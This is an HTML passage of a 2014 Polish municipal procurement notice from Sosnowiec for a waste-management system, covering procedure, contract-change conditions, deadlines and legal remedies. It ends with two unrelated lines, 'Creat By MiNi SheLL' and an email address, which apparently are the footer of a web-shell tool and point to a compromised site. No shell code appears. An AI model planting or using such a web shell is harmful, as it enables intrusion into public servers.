2) wyznaczenie spośród siebie Pełnomocnika upoważnionego do zaciągania zobowiązań w imieniu wszystkich Wykonawców realizujących wspólnie Umowę,
3) role i zadania każdego z Wykonawców wspólnie realizujących zamówienie,
4) solidarną odpowiedzialność uczestników porozumienia wobec Zamawiającego z tytułu nie wykonania lub nienależytego wykonania umowy zawartej w wyniku niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może zostać zmieniona jedynie w razie wystąpienia chociażby jednej z poniższych okoliczności:
a.gdy zmiana przedmiotu umowy będzie konieczna w zakresie niezbędnym do prawidłowego wykonania zamówienia, przy czym potrzebna do wykonania praca nie będzie stanowiła zamówienia dodatkowego w rozumieniu przepisów ustawy p.z.p., i zostanie udzielona na warunkach określonych we wzorze umowy i w cenie podanej w ofercie Wykonawcy,
b.w przypadku zaistnienia okoliczności, w których zbędne będzie wykonanie danej części zamówienia, co spowoduje rezygnację z części pracy wraz ze związanym z tym obniżeniem wynagrodzenia zgodnie z wyceną według wartości rynkowej w oparciu o średnie kwartalne ceny jednostkowe i narzuty, publikowane w wydawnictwie Sekocenbud dla kwartału poprzedzającego wprowadzenie zmiany, dla materiałów i urządzeń nie objętych wydawnictwem Sekocenbud ceny jednostkowe ustalone zostaną według ofert dostawców /producentów, 
c.zmiana sposobu realizacji zamówienia będzie wynikać ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu umowy, 
d.zmiana terminu wykonania umowy w przypadku zaistnienia okoliczności niezależnych od Wykonawcy lub Zamawiającego na warunkach określonych we wzorze umowy,
7)jest nieważna jeżeli zachodzą przesłanki określone w art. 146 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t.j. Dz. U. 2013.907 t.j z póź. zm. ) w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu, 41-200 Sosnowiec, ul. Mościckiego 14, pokój nr 223, II piętro, Polska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2014 godzina 11:30, miejsce: Urząd Miejski w Sosnowcu, 41-200 Sosnowiec, ul. Mościckiego 14, pokój nr 223, II piętro, Polska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W przedmiotowym postępowaniu w imieniu i na rzecz Miejskiego Zakładu Składowania Odpadów Sp. z o.o. z ograniczoną odpowiedzialnością Adres: ul. Grenadierów skrytka pocztowa 86, 41-200 Sosnowiec, Polska działa Gmina Sosnowiec, Al. Zwycięstwa 20, 41-200 Sosnowiec, Polska, tel. +48 32296 04 61, Fax. +48 32 296 04 46, e-mail: kier.piu@um.sosnowiec.pl, adres strony internetowej www.sosnowiec.pl, na podstawie art. 15 Ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych (Dz. U. 2013.907 j.t ze zm.) oraz pełnomocnictwa z dnia 20-12-2013r.  
1. Środki ochrony prawnej - Informacje ogólne.
1)Wykonawcom, oraz innym osobom, przysługują środki ochrony prawnej przewidziane art. 179 i n. ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2013.907 j.t z póź. zm.) jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy.
2)Środkami ochrony prawnej, o których mowa w pkt. 23.1 IDW jest odwołanie ( art. 180- 198 ) oraz skarga do sądu ( art. 198 a - 198 g).
2. Terminy wnoszenia środków ochrony prawnej.
1)Zgodnie z przepisem art. 182 ust 1 u.p.z.p. odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2 u.p.z.p., albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób;
2)Zgodnie z przepisem art. 182 ust 2 u.p.z.p. odwołanie wobec treści ogłoszenia o zamówieniu, a jeżeli postępowanie jest prowadzone w trybie przetargu nieograniczonego, także wobec postanowień specyfikacji istotnych warunków zamówienia, wnosi się w terminie 5 dni od zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub zamieszczenia specyfikacji istotnych warunków zamówienia na stronie internetowej;
3)Zgodnie z przepisem art. 182 ust 3 u.p.z.p. odwołanie wobec czynności innych niż określone w pkt 1 i 2 wnosi w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia;
4)Zgodnie z przepisem art. 198b ust 2 u.p.z.p. skargę wnosi się za pośrednictwem Prezesa Izby w terminie 7 dni od dnia doręczenia orzeczenia Izby, przesyłając jednocześnie jej odpis przeciwnikowi skargi.
Termin otwarcia ofert: 04-03-2014r. godzina 12:00, Urząd Miejski w Sosnowcu, 41-200 Sosnowiec, ul. Mościckiego 14, pokój nr 222, II piętro, Polska. Projekt Budowa kompleksowego systemu gospodarki odpadami w Sosnowcu jest dofinansowany ze środków Programu Operacyjnego Infrastruktury i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com